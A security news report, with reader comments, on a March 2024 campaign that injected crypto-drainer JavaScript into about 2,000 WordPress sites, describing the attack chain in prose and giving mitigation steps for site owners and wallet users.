The cybersecurity landscape took a dark turn in early March 2024 as researchers uncovered a sprawling campaign that compromised over 2,000 WordPress websites, turning them into crypto-draining portals designed to steal funds and NFTs from unsuspecting visitors.
The Exploit Mechanics
The attack chain began with threat actors exploiting known WordPress vulnerabilities, particularly leveraging CVE-2023-6000, to gain unauthorized access to site administration panels. Once inside, attackers injected malicious JavaScript from the domain dynamic-linx[.]com, a command-and-control infrastructure previously identified by security firm Sucuri in related campaigns.
The injected code employed sophisticated evasion tactics. Before executing its payload, the script checked for a specific cookie — if absent, the malicious operation proceeded. This selective execution helped the malware evade detection by security scanners that do not maintain persistent cookie states during analysis.
Once loaded, the drainer script displayed fake pop-up NFT deals and cryptocurrency discount offers, creating a sense of urgency to lure visitors into connecting their wallets. The malware demonstrated broad compatibility across major wallet providers, including MetaMask, Coinbase Wallet, Ledger, Phantom, and WalletConnect.
Affected Systems
The campaign unfolded in multiple waves. The initial wave compromised roughly 1,000 WordPress sites to push crypto-draining malware promoted through YouTube videos and malvertising. Not satisfied with the reach, attackers then weaponized compromised sites into brute-forcing tools that attempted to crack admin passwords at other websites.
The second wave expanded the operation to approximately 1,700 brute-forcing websites, creating a self-propagating network of compromised infrastructure. This cascading approach allowed the attackers to exponentially grow their pool of infected sites without significant additional investment.
With Bitcoin trading at approximately 69,000 and Ethereum above 3,880 during this period, the potential payouts from successful wallet drains made this campaign particularly lucrative for the threat actors involved.
The Mitigation Strategy
Website owners running WordPress installations should immediately audit their sites for unauthorized JavaScript inclusions, particularly scripts loading from external domains. Key mitigation steps include updating all WordPress core files, themes, and plugins to their latest versions, implementing Web Application Firewalls, and conducting regular malware scans.
For end users, the attack underscores the importance of verifying website authenticity before connecting any crypto wallet. Browser extensions that block unauthorized scripts and DNS-level filtering can provide additional layers of protection against crypto drainer campaigns.
Lessons Learned
This campaign reveals an alarming trend: attackers are moving beyond simple phishing emails to compromise legitimate websites that users already trust. When a familiar blog or business site suddenly displays crypto offers, visitors are far more likely to engage than they would with an obvious scam domain.
The self-propagating nature of the attack, using compromised sites to brute-force additional targets, represents an evolution in crypto-theft infrastructure that security teams must account for in their threat models.
User Action Required
If you connected a wallet to any WordPress site in early March 2024 and noticed unexpected pop-ups or NFT offers, immediately revoke all token approvals, move your assets to a fresh wallet address, and monitor your transaction history for unauthorized transfers. Hardware wallet users should verify that all recent transactions were intentionally authorized on their physical device.
Disclaimer: This article is for informational purposes only and does not constitute financial or security advice. Always conduct your own research and consult with security professionals regarding crypto asset protection.
2,000 sites and CVE-2023-6000 was the entry point. if youre running wordpress and havent patched this yet, honestly what are you doing
the real issue is most of those site owners probably dont even know theyre compromised. its not like the injected script is visible to them
most small business wordpress sites are managed by agencies that install a theme and forget about it. the site owner has no idea what CVE-2023-6000 even is. blaming them misses the point
the cookie check evasion is simple but effective. most scanners dont maintain session state so the malicious payload literally hides behind a single if statement. 2k sites and counting
dynamic-linx domain has been flagged since late 2023 and they still managed to hit 2k sites. infrastructure takedowns are way too slow
dynamic-linx has been cycling through new domains every few weeks. kill one and three pop up. whack a mole with infinite respawns because the wp sites hosting the scripts keep multiplying
fake NFT deals as the lure is smart because it targets people already comfortable connecting wallets. the drainer script drained both ETH and ERC-20 tokens in a single approval. brutal efficiency